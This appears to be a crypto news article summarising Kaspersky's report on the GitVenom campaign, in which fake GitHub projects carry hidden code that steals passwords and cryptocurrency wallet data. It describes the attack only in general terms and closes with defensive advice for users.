Hackers Attack Cryptocurrency Wallets via GitHub
According to Kaspersky Lab researchers, hackers spread malicious code through fake apps on GitHub to steal passwords and cryptocurrency.
On this page
The GitVenom campaign has been active for over two years but only recently gained widespread attention. It continues to grow rapidly, with hackers creating hundreds of fake repositories. The most common malicious apps include Instagram account enhancers, Telegram bots for managing Bitcoin wallets, and cheat tools for the Valorant video game by Riot Games.
With more and more open-source projects being published, both state-sponsored actors and cybercriminals started using freely available code as a lure to infect their targets,
the statement reads.
GitHub is a popular platform for sharing open-source applications, allowing users to browse projects and share their own creations. Both crypto developers and everyday users use the platform, making it an appealing target for hackers eager to spread malware quickly. For example, one crypto user lost over $400,000 in tokens due to the GitVenom campaign.
Related: North Korean Hackers Infiltrate GitHub & NPM to Steal Crypto
How Does the Virus Work?
Hackers embed malicious code deep within the project’s structure, using multiple programming languages like Python, JavaScript, C, and C++. They do this so skillfully that even a careful code review might not detect the threat. Additionally, they always include a README file with a description that highlights the project’s features in a smooth, polished way, often using artificial intelligence to enhance its credibility.
Typically, after launching such a file, nothing appears on the screen, but in the background, malicious processes begin running, downloading additional files and spreading malware. Once hackers gain access to the system, they collect passwords and cryptocurrency wallet data, then archive and send them via Telegram. Other trojans, like AsyncRAT and Quasar, record keystrokes and capture screenshots in stealth mode.
While coded in different programming languages, the malicious payloads stored inside the fake projects had the same goal – download further malicious components from an attacker-controlled GitHub repository and execute them,
the researchers clarified in their report.
Advice for Users
Hackers constantly update their development and coding tactics to make it harder to detect their activities, including bypassing antivirus software. Researchers recommend that users manually review the code whenever possible, trust only well-established long-term projects, and run unfamiliar applications on virtual machines. Additionally, when evaluating trustworthiness, remember that hackers often artificially inflate comment counts to appear more credible.
Related: SpyAgent Malware Steals Crypto Private Keys
It’s important to note that, during the report’s preparation, Kaspersky Lab researchers discovered not only new fraudulent projects but also repositories created more than two years ago that are still active and in use. Based on download statistics, researchers estimate the number of victims could be in the thousands. The largest groups of victims are in Russia, Brazil, and Turkey, though the malicious campaign is global.
The content on The Coinomist is for informational purposes only and should not be interpreted as financial advice. While we strive to provide accurate and up-to-date information, we do not guarantee the accuracy, completeness, or reliability of any content. Neither we accept liability for any errors or omissions in the information provided or for any financial losses incurred as a result of relying on this information. Actions based on this content are at your own risk. Always do your own research and consult a professional. See our Terms, Privacy Policy, and Disclaimers for more details.
Articles by this author
